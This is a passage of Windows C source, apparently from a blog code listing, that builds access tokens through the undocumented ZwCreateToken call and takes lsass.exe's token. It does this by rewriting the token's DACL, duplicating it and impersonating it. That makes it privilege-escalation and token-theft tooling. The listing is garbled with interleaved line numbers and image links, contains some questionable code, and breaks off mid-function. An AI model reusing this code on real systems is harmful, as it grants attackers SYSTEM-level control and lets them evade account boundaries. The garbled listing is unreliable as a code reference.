    if(!SetUserObjectSecurity(Hhandle,&sinfo,pSecurityDescriptor1))
    {
        printf("SetKernelObjectSecurity Error:%d\n",GetLastError());
        return FALSE;
    }
    // Cleanup (success path only): see the LocalFree(POldAcl) note above.
    if(POldAcl)
        LocalFree(POldAcl);
    if(PNewAcl)
        LocalFree(PNewAcl);
    pfree(pSD);
    pfree(pSecurityDescriptor1);
    pfree(pDacl);
    pfree(pSacl);
    pfree(pOwner);
    pfree(pPrimaryGroup);
    return TRUE;
}
//根据指定用户名来建立Token
HANDLE NtCreateTokenAsuser(char *user)
{
580
SID *GroupSid,*UserSid;
581
char StringSid[SIZE],UserDefaultGroup[SIZE];
582
DWORD SidSize,GroupCount,GroupCount2,IsNotUsersGroup = 1;
583
char *DomainName,**UserGroup,*CurrentUser;
584
DWORD cbSid,cbDomainName,SessionId,sessionlen;
585
SID_NAME_USE peUse;
586
int ErrorCode,i;
587
LUID Luid = ANONYMOUS_LOGON_LUID;
588
//LUID Luid = SYSTEM_LUID;
589
SECURITY_QUALITY_OF_SERVICE security_quality_of_service =
{
591
sizeof( security_quality_of_service ),
592
SecurityAnonymous,
593
SECURITY_STATIC_TRACKING,
594
FALSE
595
};
596
OBJECT_ATTRIBUTES object_attributes =
{
598
sizeof( object_attributes ),
599
NULL,
600
NULL,
601
0,
602
NULL,
603
&security_quality_of_service
604
};
606
TOKEN_SOURCE token_source;
607
TOKEN_PRIVILEGES *token_privileges;
608
TOKEN_GROUPS *token_groups;
609
TOKEN_USER token_user;
610
TOKEN_OWNER token_owner;
611
TOKEN_PRIMARY_GROUP token_primary_group;
612
TOKEN_DEFAULT_DACL token_default_dacl,*SelfDacl;
613
ACL NewAcl2,*NewAcl;
614
TOKEN_TYPE tokentype;
615
HANDLE token,SelfToken;
616
NTSTATUS ntstatus,ntstatus2;
617
PNtCreateToken NtCreateToken;
618
HMODULE ntdllmodule;
619
ACCESS_MASK DesiredAccess;
620
LARGE_INTEGER ExpireTime;
621
EXPLICIT_ACCESS ExplicitAccess;
622
//给winstation用的
623
HDESK hdesk;
624
HWINSTA hwinsta;
625
DWORD PrivilegeCount;
626
//是否是SYSTEM用户
627
DWORD IfIsSystemUser = 0,IfIsAdmin = 0;
628
//定义结束
630
//获取CreateToken地址
631
ntdllmodule = GetModuleHandle("ntdll");
632
if(ntdllmodule == NULL )
{
634
printf("[-] GetModuleHandle ntdll error:%d\n",GetLastError());
635
return INVALID_HANDLE_VALUE;
636
}
637
NtCreateToken = (PNtCreateToken) GetProcAddress(ntdllmodule,"ZwCreateToken");
638
if(NtCreateToken == NULL)
{
640
printf("[-] GetProcAddress NtCreateToken error:%d\n",GetLastError());
641
return INVALID_HANDLE_VALUE;
642
}
643![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
644
if(stricmp(user,"system") == 0)
{
646
IfIsSystemUser = 1;
647
//Luid.LowPart = 0x3e7;
648
//Luid.HighPart = 0x0;
649
}
650
//arg 2 for NtCreateToken();
651
DesiredAccess = TOKEN_ALL_ACCESS;
652
//arg 3 for NtCreateToken();
653
//arg 4 for NtCreateToken();
654
//IN TOKEN_TYPE TokenType,
655
tokentype = TokenPrimary;
656
//arg 5 for NtCreateToken();
657
//memcpy(&Luid,&SYSTEM_LUID,sizeof(Luid));
/**//*
659
if(!AllocateLocallyUniqueId(&Luid))
660
{
661
printf("AllocateLocallyUniqueId Failed:%d\n",GetLastError());
662
return INVALID_HANDLE_VALUE;
663
}
664
*/
665
//arg 6 for NtCreateToken();
666
ExpireTime.LowPart = 0xffffffff;
667
ExpireTime.HighPart = 0x7fffffff;
668
//printf("sizeof(ExpireTime) = %d\n",sizeof(ExpireTime));
669
//QueryPerformanceFrequency(&ExpireTime);
670
//arg 7 for NtCreateToken();
671
//token_user正确
672
token_user.User.Sid = GetUserSid(user);
673
if(token_user.User.Sid == NULL)
674
return INVALID_HANDLE_VALUE;
675
token_user.User.Attributes = 0; //must be 0
676
if(IfIsSystemUser == 0) //一般用户
{
678
//arg 8 for NtCreateToken();
679
if(!GetUserGroup(user,&UserGroup,&GroupCount))
680
return INVALID_HANDLE_VALUE;
681
//printf("=====================\nGet %d groups\n",GroupCount);
682
//给token_groups申请内存
683
//看用户组里面有没有"Users"
684
IsNotUsersGroup = 1;
685
for(i=0;i<GroupCount;i++)
686![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
687
CurrentUser = UserGroup[i];
688
if(stricmp(CurrentUser,"Users") == 0)
689![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
690
IsNotUsersGroup = 0;
691
continue;
692
}
693
if(stricmp(CurrentUser,"Administrators") == 0)
694![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
695
IfIsAdmin = 1;
696
continue;
697
}
698
}
699
//保存一下,后面要用
700
GroupCount2 = GroupCount;
701
//没有就+1,有就+0
702
GroupCount += IsNotUsersGroup + 2;
703
token_groups = (PTOKEN_GROUPS) malloc(4+(4+4)*GroupCount+1);
704
if(token_groups == NULL)
705![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
706
printf("Malloc for token_groups failed:%d\n",GetLastError());
707
return INVALID_HANDLE_VALUE;
708
}
709
//加"None","Everyone","INTERACTIVE" 组
710
//printf("GroupCount:%d\n",GroupCount);
711
token_groups->GroupCount = GroupCount;
712
//给第11个参数用
713
//memset(UserDefaultGroup,0,SIZE);
714
//strncpy(UserDefaultGroup,UserGroup[0],SIZE -1 );
715
//printf("GroupCount:%d\n",GroupCount);
716
//token_group需要最少加以下四个组:
717
//只有Users可能有用户或者帐号存在
718
//"None","Everyone","Users","INTERACTIVE"他们的ATTribute都是7
719
if(DebugLevel != 7)
720![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
721
printf("Using DebugLevel 0x%x \n",DebugLevel);
722
}
723
for(i=0;i<GroupCount2;i++)
724![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
725
//printf("%d:%s\n",i,UserGroup[i]);
726![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
727
CurrentUser = UserGroup[i];
728
GroupSid = GetUserSid(CurrentUser);
729
if(GroupSid == NULL)
730
return INVALID_HANDLE_VALUE;
731
token_groups->Groups[i].Sid = GroupSid;
732
token_groups->Groups[i].Attributes = DebugLevel;
733
free(CurrentUser);
734
}
735
free(UserGroup);
736![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
737
GroupSid = GetUserSid("None");
738
if(GroupSid == NULL)
739
return INVALID_HANDLE_VALUE;
740
token_groups->Groups[i].Sid = GroupSid;
741
token_groups->Groups[i++].Attributes = DebugLevel;
742
*/
743
GroupSid = GetUserSid("Everyone");
744
if(GroupSid == NULL)
745
return INVALID_HANDLE_VALUE;
746
token_groups->Groups[i].Sid = GroupSid;
747
token_groups->Groups[i++].Attributes = DebugLevel;
748![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
749
GroupSid = GetUserSid("INTERACTIVE");
750
if(GroupSid == NULL)
751
return INVALID_HANDLE_VALUE;
752
token_groups->Groups[i].Sid = GroupSid;
753
token_groups->Groups[i++].Attributes = DebugLevel;
754![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
755
if(IsNotUsersGroup)
756![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
757
GroupSid = GetUserSid("Users");
758
if(GroupSid == NULL)
759
return INVALID_HANDLE_VALUE;
760
token_groups->Groups[i].Sid = GroupSid;
761
token_groups->Groups[i++].Attributes = DebugLevel;
762
}
763
//arg 9 for NtCreateToken();
764
//这个倒没错
765
//先申请内存
766
if(IfIsAdmin == 0) //如果不是管理员组
767![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
768
PrivilegeCount = 2;
769
token_privileges = (PTOKEN_PRIVILEGES) malloc(4 + (3*4)*PrivilegeCount + 4);
770
if(token_privileges == NULL)
771![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
772
printf("malloc failed for PTOKEN_PRIVILEGES in NtCreateTokenAsuser\n");
773
return INVALID_HANDLE_VALUE;
774
}
775
token_privileges->PrivilegeCount = PrivilegeCount;
776
(token_privileges->Privileges)[0].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT;
777
(token_privileges->Privileges)[0].Luid = GetLuidFromText("SeChangeNotifyPrivilege");
778![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
779
(token_privileges->Privileges)[1].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT;
780
(token_privileges->Privileges)[1].Luid = GetLuidFromText("SeUndockPrivilege");
781
}
782
else
783![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
784
token_privileges = MakeAdminPriv();
785
if(token_privileges == NULL)
786
return INVALID_HANDLE_VALUE;
787
}
788![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
789
if(!AllocateLocallyUniqueId(&(token_privileges.Privileges[0].Luid)))
790
{
791
printf("AllocateLocallyUniqueId for token_privileges Failed:%d\n",GetLastError());
792
return INVALID_HANDLE_VALUE;
793
}
794
*/
795
//arg 10 for NtCreateToken();
796
//正确的方法
797
token_owner.Owner = GetUserSid(user);
798
if(token_owner.Owner == NULL)
799
return INVALID_HANDLE_VALUE;
800
//arg 11 for NtCreateToken();
801
//PrimaryGroup统一都是None
802
token_primary_group.PrimaryGroup = GetUserSid(user);
803
if(token_primary_group.PrimaryGroup == NULL)
804
return INVALID_HANDLE_VALUE;
805
}
806
else
807![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
808
//设置usergroup
809
//三个组:administrators(0xe),everyone(0x7),Authenticated Users(0x7)
810
GroupCount = 2;
811
token_groups = (PTOKEN_GROUPS) malloc(4+(4+4)*GroupCount+1);
812
if(token_groups == NULL)
813![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
814
printf("Malloc for token_groups failed:%d\n",GetLastError());
815
return INVALID_HANDLE_VALUE;
816
}
817
token_groups->GroupCount = GroupCount;
818
//自定义的debuglevel
819
if(DebugLevel != 7)
820![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
821
printf("Using DebugLevel 0x%x \n",DebugLevel);
822
}
823
i = 0;
824
GroupSid = GetUserSid("administrators");
825
if(GroupSid == NULL)
826
return INVALID_HANDLE_VALUE;
827
token_groups->Groups[i].Sid = GroupSid;
828
token_groups->Groups[i++].Attributes = 0xe;
829![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
830
GroupSid = GetUserSid("Everyone");
831
if(GroupSid == NULL)
832
return INVALID_HANDLE_VALUE;
833
token_groups->Groups[i].Sid = GroupSid;
834
token_groups->Groups[i++].Attributes = DebugLevel;
835![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
836
GroupSid = GetUserSid("Authenticated Users");
837
if(GroupSid == NULL)
838
return INVALID_HANDLE_VALUE;
839
token_groups->Groups[i].Sid = GroupSid;
840
token_groups->Groups[i++].Attributes = DebugLevel;
841
*/
842
//设置 token_privileges
843
token_privileges = MakeAdminPriv();
844
if(token_privileges == NULL)
845
return INVALID_HANDLE_VALUE;
846
//token_owner
847
token_owner.Owner = GetUserSid("administrators");
848
if(token_owner.Owner == NULL)
849
return INVALID_HANDLE_VALUE;
850
//arg 11 for NtCreateToken();
851
//PrimaryGroup统一都是None
852
token_primary_group.PrimaryGroup = GetUserSid("SYSTEM");
853
if(token_primary_group.PrimaryGroup == NULL)
854
return INVALID_HANDLE_VALUE;
855
}
856
//arg 12 for NtCreateToken();
857
//NULL?
858
//token_default_dacl
859![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
860
token_default_dacl->DefaultDacl->AclRevision:2
861
token_default_dacl->DefaultDacl->Sbz1:0
862
token_default_dacl->DefaultDacl->AclSize:64
863
token_default_dacl->DefaultDacl->AceCount:2
864
token_default_dacl->DefaultDacl->Sbz2:0
865
*/
866
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, &SelfToken))
867![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
868
printf("OpenProcessToken self Error:%d\n",GetLastError());
869
return INVALID_HANDLE_VALUE;
870
}
871
BuildExplicitAccessWithName(&ExplicitAccess,user,GENERIC_ALL,GRANT_ACCESS,NO_INHERITANCE);
872
SelfDacl = (PTOKEN_DEFAULT_DACL) GetFromToken(SelfToken,TokenDefaultDacl);
873
if(SelfDacl == NULL)
874![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
875
CloseHandle(SelfToken);
876
return INVALID_HANDLE_VALUE;
877
}
878
ErrorCode = SetEntriesInAcl(1,&ExplicitAccess,SelfDacl->DefaultDacl,&NewAcl);
879
if(ErrorCode != ERROR_SUCCESS)
880![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
881
printf("SetEntriesInAcl Under NtCreateTokenAsuser Failed:%d\n",ErrorCode);
882
CloseHandle(SelfToken);
883
return INVALID_HANDLE_VALUE;
884
}
885
//获得当前进程的SessionID,然后再同样set到新的token里面
886
//printf("SelfProcess:\n");
887
//DisplayTokenSessionId(SelfToken);
888
//SessionId,sessionlen;
889
sessionlen = sizeof(DWORD);
890
if(!GetTokenInformation(SelfToken,TokenSessionId,&SessionId,sessionlen,&sessionlen))
891![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
892
printf("GetTokenInformation TokenSessionId Failed:%d\n",GetLastError());
893
CloseHandle(SelfToken);
894
return INVALID_HANDLE_VALUE;
895
}
896
CloseHandle(SelfToken);
897
token_default_dacl.DefaultDacl = NewAcl;
898![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
899
NewAcl2.AclRevision = 2;
900
NewAcl2.Sbz1 = 0;
901
NewAcl2.AclSize = 64;
902
NewAcl2.AceCount = 2;
903
NewAcl2.Sbz2 = 0;
904
ErrorCode = SetEntriesInAcl(0,NULL,NULL,&NewAcl);
905
if(ErrorCode != ERROR_SUCCESS)
906
{
907
printf("SetEntriesInAcl As new one failed:%d\n",ErrorCode);
908
return INVALID_HANDLE_VALUE;
909
}
910
token_default_dacl.DefaultDacl = NewAcl;
911
*/
912
//arg 13 for NtCreateToken();
913
//token_source
914
if(IfIsSystemUser == 0) //一般用户
915
memcpy(token_source.SourceName,"seclogon",8);
916
else
917
memcpy(token_source.SourceName,"*SYSTEM*",8);
918
//生成LUID
919
//token_source.SourceIdentifier = Luid;
920
if(!AllocateLocallyUniqueId(&(token_source.SourceIdentifier)))
921![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
922
printf("AllocateLocallyUniqueId for token_source Failed:%d\n",GetLastError());
923
return INVALID_HANDLE_VALUE;
924
}
925
if(IfIsSystemUser == 0)
926![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
927
//将该用户权限加入到当前用户所使用的 桌面 和 winstation
928
//hwinsta = OpenWindowStation("WinSta0",TRUE,WINSTA_ALL);
929
hwinsta = GetProcessWindowStation();
930
if (hwinsta == NULL)
931![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
932
printf("OpenWindowStation Error:%d\n",GetLastError());
933
return INVALID_HANDLE_VALUE;
934
}
935
//hwinstaold = GetProcessWindowStation();
936![](//www.cppblog.com/Images/OutliningIndicators/InBlock.gif)
937
//
938
// set the windowstation to winsta0 so that you obtain the
939
// correct default desktop
940
//
941![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
942
if (!SetProcessWindowStation(hwinsta))
943
{
944
printf("SetProcessWindowStation Error:%d\n",GetLastError());
945
CloseWindowStation(hwinsta);
946
return INVALID_HANDLE_VALUE;
947
}
948
*/
949
//
950
// obtain a handle to the "default" desktop
951
//
952
//hdesk = OpenDesktop("Default",DF_ALLOWOTHERACCOUNTHOOK,FALSE,DESKTOP_ALL);
953
hdesk = GetThreadDesktop(GetCurrentThreadId());
954
if (hdesk == NULL)
955![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
956
printf("OpenDesktop Error:%d\n",GetLastError());
957
CloseWindowStation(hwinsta);
958
return INVALID_HANDLE_VALUE;
959
}
960
// add the user to interactive windowstation
961
//
962
AddUserPrivToHandle(hwinsta,user,WINSTA_ALL);
963
AddUserPrivToHandle(hdesk,user,DESKTOP_ALL);
964![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
965
if (!AddTheAceWindowStation(hwinsta, token_user.User.Sid))
966
{
967
printf("AddTheAceWindowStation Error:%d\n",GetLastError());
968
CloseWindowStation(hwinsta);
969
CloseDesktop(hdesk);
970
return INVALID_HANDLE_VALUE;
971
}
972
//
973
// add user to "default" desktop
974
//
975
if (!AddTheAceDesktop(hdesk, token_user.User.Sid))
976
{
977
printf("AddTheAceDesktop Error:%d\n",GetLastError());
978
CloseWindowStation(hwinsta);
979
CloseDesktop(hdesk);
980
return INVALID_HANDLE_VALUE;
981
}
982
*/
983
if (!SetProcessWindowStation(hwinsta))
984![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
985
printf("SetProcessWindowStation Error:%d\n",GetLastError());
986
CloseWindowStation(hwinsta);
987
return INVALID_HANDLE_VALUE;
988
}
989
if(!SetThreadDesktop(hdesk))
990![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
991
printf("SetThreadDesktop Error:%d\n",GetLastError());
992
CloseDesktop(hdesk);
993
return INVALID_HANDLE_VALUE;
994
}
995
//
996
// close the handles to the interactive windowstation and desktop
997
//
998
CloseWindowStation(hwinsta);
999
CloseDesktop(hdesk);
1000
}
1001
//开始create
1002
ntstatus = NtCreateToken( &token,
1003
DesiredAccess,
1004
&object_attributes,
1005
tokentype,
1006
&Luid,
1007
&ExpireTime,
1008
&token_user,
1009
token_groups,
1010
token_privileges,
1011
&token_owner,
1012
&token_primary_group,
1013
&token_default_dacl,
1014
&token_source
1015
);
1016
if(ntstatus != STATUS_SUCCESS)
1017![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1018
printf("CreateToken Failed:%d\n",LsaNtStatusToWinError(ntstatus));
1019
return INVALID_HANDLE_VALUE;
1020
}
1021
//开始释放内存
1022![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
1023
pfree(token_user.User.Sid);
1024
pfree(token_groups);
1025
pfree(token_privileges);
1026
pfree(token_owner.Owner);
1027
pfree(token_primary_group.PrimaryGroup);
1028
if(NewAcl != NULL)
1029
LocalFree(NewAcl);
1030
*/
1031![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
/**//*
1032
printf("NewToken:\n");
1033
DisplayTokenSessionId(token);
1034
*/
1035
if(TokenSessionId > 0)
1036![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1037
sessionlen = sizeof(DWORD);
1038
if(!SetTokenInformation(token,TokenSessionId,&SessionId,sessionlen))
1039![](//www.cppblog.com/Images/OutliningIndicators/ExpandedSubBlockStart.gif)
![](//www.cppblog.com/Images/OutliningIndicators/ContractedSubBlock.gif)
{
1040
printf("SetTokenInformation TokenSessionId Failed:%d\n",GetLastError());
1041
}
1042
}
1043
return token;
1044
}
//Output: *groupname points to an array of group names; *groupcount is the number of groups.
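/*
 * GetUserGroup - enumerate the local groups `username` belongs to (directly or
 * indirectly, LG_INCLUDE_INDIRECT) as a malloc'd array of malloc'd ANSI strings.
 *
 * username   : ANSI account name; converted to UTF-16 for NetUserGetLocalGroups.
 * groupname  : out, receives the array. Each entry and the array itself are
 *              owned by the caller and released with free().
 * groupcount : out, number of valid entries in *groupname.
 *
 * Returns TRUE on success. On any failure (conversion error, API error, no
 * buffer returned, allocation or conversion failure for an entry) it returns
 * FALSE, releases everything allocated so far and leaves the out-parameters
 * untouched, so the caller never sees a partially filled list.
 *
 * Fixes relative to the previous version: the NetAPI buffer is freed through
 * its base pointer (the old code advanced pBuf and then freed the advanced
 * pointer), the buffer is no longer leaked when the array allocation fails,
 * the wide-to-ANSI conversion is sized by WideCharToMultiByte instead of
 * wcslen()+1 (a multibyte code page can need more than one byte per WCHAR),
 * and a failed/truncated username conversion is reported instead of querying
 * a wrong account.
 */
BOOL GetUserGroup(char *username,char ***groupname,int *groupcount)
{
    LPLOCALGROUP_USERS_INFO_0 pBuf = NULL; /* base pointer, the only value NetApiBufferFree accepts */
    DWORD dwLevel = 0;
    DWORD dwFlags = LG_INCLUDE_INDIRECT;
    DWORD dwPrefMaxLen = MAX_PREFERRED_LENGTH;
    DWORD dwEntriesRead = 0;
    DWORD dwTotalEntries = 0;
    NET_API_STATUS nStatus;
    WCHAR wUserName[100];
    char **name = NULL;
    DWORD i;

    /* A zero return also covers a name longer than the 100-WCHAR buffer. */
    if (MultiByteToWideChar(CP_ACP, 0, username, -1, wUserName,
                            sizeof(wUserName) / sizeof(wUserName[0])) == 0) {
        printf("MultiByteToWideChar failed in GetUserGroup:%lu\n", (unsigned long)GetLastError());
        return FALSE;
    }

    nStatus = NetUserGetLocalGroups(NULL, wUserName, dwLevel, dwFlags,
                                    (LPBYTE *)&pBuf, dwPrefMaxLen,
                                    &dwEntriesRead, &dwTotalEntries);
    if (nStatus != NERR_Success) {
        printf("NetUserGetLocalGroups failed:%lu\n", (unsigned long)nStatus);
        if (pBuf != NULL) {
            NetApiBufferFree(pBuf);
        }
        return FALSE;
    }
    if (pBuf == NULL) {
        return FALSE;
    }

    name = malloc(dwEntriesRead * sizeof(*name));
    if (name == NULL) {
        printf("malloc failed in GetUserGroup for name:%d\n",GetLastError());
        NetApiBufferFree(pBuf);
        return FALSE;
    }

    for (i = 0; i < dwEntriesRead; i++) {
        const WCHAR *wname = pBuf[i].lgrui0_name;
        char *p;
        /* Size query includes the terminating NUL because cchWideChar is -1. */
        int needed = WideCharToMultiByte(CP_ACP, 0, wname, -1, NULL, 0, NULL, NULL);

        if (needed <= 0) {
            printf("WideCharToMultiByte (size) failed in GetUserGroup:%lu\n", (unsigned long)GetLastError());
            goto fail;
        }
        p = malloc((size_t)needed);
        if (p == NULL) {
            printf("malloc failed in GetUserGroup:%d\n",GetLastError());
            goto fail;
        }
        if (WideCharToMultiByte(CP_ACP, 0, wname, -1, p, needed, NULL, NULL) == 0) {
            printf("WideCharToMultiByte failed in GetUserGroup:%lu\n", (unsigned long)GetLastError());
            free(p);
            goto fail;
        }
        name[i] = p;
    }

    NetApiBufferFree(pBuf);
    *groupname = name;
    *groupcount = (int)dwEntriesRead;
    return TRUE;

fail:
    /* Entries [0, i) were filled; release them, the array and the NetAPI buffer. */
    while (i-- > 0) {
        free(name[i]);
    }
    free(name);
    NetApiBufferFree(pBuf);
    return FALSE;
}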
//enable a privilege in the current process token
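/*
 * GrantPriv - enable one named privilege in the current process token.
 *
 * priv : privilege name as accepted by LookupPrivilegeValue (for example the
 *        strings passed by GrantPrivFromLsass).
 *
 * Returns 0 when the privilege is enabled, -1 otherwise; each failure prints
 * a diagnostic to stderr.
 *
 * AdjustTokenPrivileges returns TRUE even when the token does not hold the
 * privilege at all and only signals that through
 * GetLastError() == ERROR_NOT_ALL_ASSIGNED; that case is now reported as -1
 * instead of being treated as success. The process token handle is closed on
 * every path (it used to leak when AdjustTokenPrivileges failed).
 */
int GrantPriv(char *priv)
{
    HANDLE token = NULL;
    TOKEN_PRIVILEGES tkp;
    int rc = -1;

    if (LookupPrivilegeValue(NULL, priv, &tkp.Privileges[0].Luid) == FALSE) {
        fprintf(stderr, "LookupPrivilegeValue failed: 0x%X\n", (unsigned)GetLastError());
        return -1;
    }
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token) == FALSE) {
        fprintf(stderr, "OpenProcessToken SELF Failed: 0x%X\n", (unsigned)GetLastError());
        return -1;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!AdjustTokenPrivileges(token, FALSE, &tkp, 0, NULL, NULL)) {
        fprintf(stderr, "AdjustTokenPrivileges Failed: 0x%X\n", (unsigned)GetLastError());
    } else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        /* TRUE return, but the token does not hold this privilege. */
        fprintf(stderr, "AdjustTokenPrivileges: %s is not held by this token\n", priv);
    } else {
        rc = 0;
    }

    CloseHandle(token);
    return rc;
}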
//inherit privileges from lsass.exe
/*
 * GrantPrivFromLsass - borrow the access token of process `pid` (lsass.exe,
 * per the comment above) and leave the calling thread impersonating a
 * primary-token copy of it, then try to enable four privileges through
 * GrantPriv.
 *
 * Sequence visible in this function: OpenProcess(PROCESS_QUERY_INFORMATION),
 * OpenProcessToken(STANDARD_RIGHTS_READ|WRITE_DAC), AddUserPrivToHandle(token,
 * "administrators", TOKEN_ALL_ACCESS) — its body is outside this chunk; the
 * commented sketch at the end suggests it rewrites the token object's DACL,
 * not confirmed here — then a second OpenProcessToken(TOKEN_ALL_ACCESS),
 * DuplicateTokenEx(..., TokenPrimary) and ImpersonateLoggedOnUser.
 *
 * Returns 0 on success, -1 on the first failing call (a message is printed).
 *
 * NOTE(review): LsassToken is never closed once DuplicateTokenEx has run, and
 * NewToken is intentionally left open (see the commented-out CloseHandle)
 * because the impersonation it backs must outlive this call; no RevertToSelf
 * is ever issued here. The four GrantPriv results are ignored, so a privilege
 * that could not be enabled is not reported by this function.
 *
 * From a monitoring standpoint the distinctive part of this routine is a
 * cross-process token opened with WRITE_DAC and then re-opened for
 * TOKEN_ALL_ACCESS and duplicated; DACL changes on another process's token
 * object are a high-signal event to audit.
 */
int GrantPrivFromLsass(int pid)
{
HANDLE LsassHandle,LsassToken,NewToken;
// first open the process to obtain a HANDLE
//PROCESS_QUERY_INFORMATION ,FALSE
//LsassHandle = OpenProcess(PROCESS_ALL_ACCESS,TRUE,pid);
LsassHandle = OpenProcess(PROCESS_QUERY_INFORMATION,FALSE,pid);
// then OpenProcessToken(READ|WRITE
if(LsassHandle == NULL)
{
printf("OpenProcess %d Error:%d\n",pid,GetLastError());
return -1;
}
// then open its token; WRITE_DAC is what allows the DACL rewrite below
if(!OpenProcessToken(LsassHandle,STANDARD_RIGHTS_READ|WRITE_DAC,&LsassToken))
{
printf("OpenProcessToken First Error:%d\n",GetLastError());
CloseHandle(LsassHandle);
return -1;
}
// get the token's ACL information
//pSecurityDescriptor = NULL;
//size = 0;
//len = 0;
// allocate memory first
// AddUserPrivToHandle is defined elsewhere in this file; what it grants is not visible here
if(!AddUserPrivToHandle(LsassToken,"administrators",TOKEN_ALL_ACCESS))
{
CloseHandle(LsassToken);
CloseHandle(LsassHandle);
return -1;
}
// close the handle
CloseHandle(LsassToken);
// open the token again, now with full access
if(!OpenProcessToken(LsassHandle,TOKEN_ALL_ACCESS,&LsassToken))
{
printf("OpenProcessToken LsassHandle Error:%d\n",GetLastError());
CloseHandle(LsassHandle);
return -1;
}
// close the handle
CloseHandle(LsassHandle);
// duplicate the token as a primary token
if(!DuplicateTokenEx(LsassToken,TOKEN_ALL_ACCESS,NULL,SecurityImpersonation,TokenPrimary,&NewToken))
{
printf("DuplicateTokenEx Error:%d\n",GetLastError());
return -1;
}
// NOTE(review): LsassToken is not closed on either path from here on.
//CloseHandle(LsassToken);
if(!ImpersonateLoggedOnUser(NewToken))
{
